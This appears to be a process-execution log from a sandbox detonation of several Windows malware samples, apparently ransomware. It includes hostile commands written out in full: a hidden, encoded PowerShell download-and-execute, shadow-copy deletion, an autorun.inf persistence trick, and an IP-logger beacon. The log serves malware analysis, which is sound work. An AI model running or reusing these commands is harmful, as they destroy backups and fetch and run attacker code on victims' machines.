"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8036 -prefsLen 32952 -prefMapHandle 8040 -prefMapSize 270279 -jsInitHandle 8044 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8052 -initialChannelId {44f8ba09-8d1b-41c3-ae8a-6f935b52ba8f} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 22 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8228 -prefsLen 32952 -prefMapHandle 8232 -prefMapSize 270279 -jsInitHandle 8236 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8244 -initialChannelId {56eb42ed-c588-4968-ae13-5426e5cbf55b} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 23 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8440 -prefsLen 32952 -prefMapHandle 8444 -prefMapSize 270279 -jsInitHandle 8448 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8456 -initialChannelId {347f31cb-dc05-45a1-9e9c-cfcb0520cf3a} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 24 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8600 -prefsLen 32952 -prefMapHandle 8604 -prefMapSize 270279 -jsInitHandle 8608 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5628 -initialChannelId {68a142d0-e6da-4bd3-899c-c2569c0a692c} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 25 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5896 -prefsLen 32952 -prefMapHandle 5892 -prefMapSize 270279 -jsInitHandle 6036 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8644 -initialChannelId {0baa711d-8e72-487e-b860-8b6e42b71519} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 26 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8764 -prefsLen 32952 -prefMapHandle 8768 -prefMapSize 270279 -jsInitHandle 8772 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8776 -initialChannelId {e5de97bf-f7fe-4890-b67f-d106e8431157} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 27 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8948 -prefsLen 32952 -prefMapHandle 8952 -prefMapSize 270279 -jsInitHandle 8956 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8964 -initialChannelId {b10f0107-0a23-4f05-8108-5774f6e1aab1} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 28 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7036 -prefsLen 32952 -prefMapHandle 7032 -prefMapSize 270279 -jsInitHandle 7028 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7016 -initialChannelId {07c18d23-d063-4651-b5b1-7a2bbaa160a5} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 29 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7656 -prefsLen 32952 -prefMapHandle 7632 -prefMapSize 270279 -jsInitHandle 7628 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7620 -initialChannelId {b429cafd-bdfa-4c8c-8539-d5807be5c49d} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 30 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7604 -prefsLen 32952 -prefMapHandle 7504 -prefMapSize 270279 -jsInitHandle 7516 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7316 -initialChannelId {629840ce-9743-49bd-90e6-2165e5079fde} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 31 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9312 -prefsLen 32952 -prefMapHandle 9316 -prefMapSize 270279 -jsInitHandle 9320 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9332 -initialChannelId {6d49cf93-407e-430d-b55f-f3b334e11bf0} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 32 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9344 -prefsLen 32952 -prefMapHandle 9348 -prefMapSize 270279 -jsInitHandle 9352 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9364 -initialChannelId {d6577547-e3e4-4cf3-b477-a9a14dbebd2d} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 33 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9376 -prefsLen 32952 -prefMapHandle 9380 -prefMapSize 270279 -jsInitHandle 9384 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9396 -initialChannelId {e776b697-df1c-4a1d-812d-7309cb88b64e} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 34 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9880 -prefsLen 32952 -prefMapHandle 9884 -prefMapSize 270279 -jsInitHandle 9888 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9896 -initialChannelId {72582720-248b-4daa-b2a7-b64694aa2aba} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 35 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9908 -prefsLen 32952 -prefMapHandle 9912 -prefMapSize 270279 -jsInitHandle 9916 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9928 -initialChannelId {8d2cf194-9c33-46cd-aeb3-d22eb2e88bd8} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 36 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9940 -prefsLen 32952 -prefMapHandle 9944 -prefMapSize 270279 -jsInitHandle 9948 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9956 -initialChannelId {31a6a4b3-960f-4aaf-878c-7208dc251229} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 37 tab

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=6308,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=1352 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=4840,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3376 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=6684,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4212 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3456,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2988 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\" -ad -an -ai#7zMap30351:190:7zEvent13546

C:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe

"C:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe"

C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe

"C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" "/rC:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe"

C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe

"C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w00000240

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe

C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe

C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe

C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe

"C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w00000240

C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe

"C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w00000240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=5012,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5616 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5424,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6404 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\" -ad -an -ai#7zMap21626:190:7zEvent4642

C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe

"C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/2De1W6

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument https://iplogger.com/2De1W6

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=7356,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --always-read-main-dll --field-trial-handle=7468,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5752 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --always-read-main-dll --field-trial-handle=2924,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=7284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6736,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5860 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6208,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=7300 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d\" -ad -an -ai#7zMap12901:190:7zEvent28505

C:\Windows\System32\Notepad.exe

"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Downloads\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d.js

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d.js"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=7472,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6524 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4668,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4032 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\" -ad -an -ai#7zMap29832:190:7zEvent3947

C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe

"C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ZeroLocker\ZeroRescue.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=5708,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5496,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=7220 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\" -ad -an -ai#7zMap6371:190:7zEvent12940

C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe

"C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C echo ^[autorun^] >autorun.inf

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C echo ^open^=KasperskyScan^.exe >>autorun.inf

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C echo ^execute=^KasperskyScan^.exe >>autorun.inf

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet && wmic shadowcopy delete

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=6624,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=1248 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7544,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5432 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\" -ad -an -ai#7zMap25546:190:7zEvent32505

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\" -ad -an -ai#7zMap14106:190:7zEvent8523

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3\" -ad -an -ai#7zMap16342:190:7zEvent8403

C:\Users\Admin\Downloads\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3.exe

"C:\Users\Admin\Downloads\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start %temp%\tmp1.jpg

C:\Users\Admin\AppData\Local\Temp\tmp1.jpg

C:\Users\Admin\AppData\Local\Temp\tmp1.jpg

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start %temp%\tmp2.exe

C:\Users\Admin\AppData\Local\Temp\tmp2.exe

C:\Users\Admin\AppData\Local\Temp\tmp2.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe

"C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\AppData\Local\Temp\tmp2.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

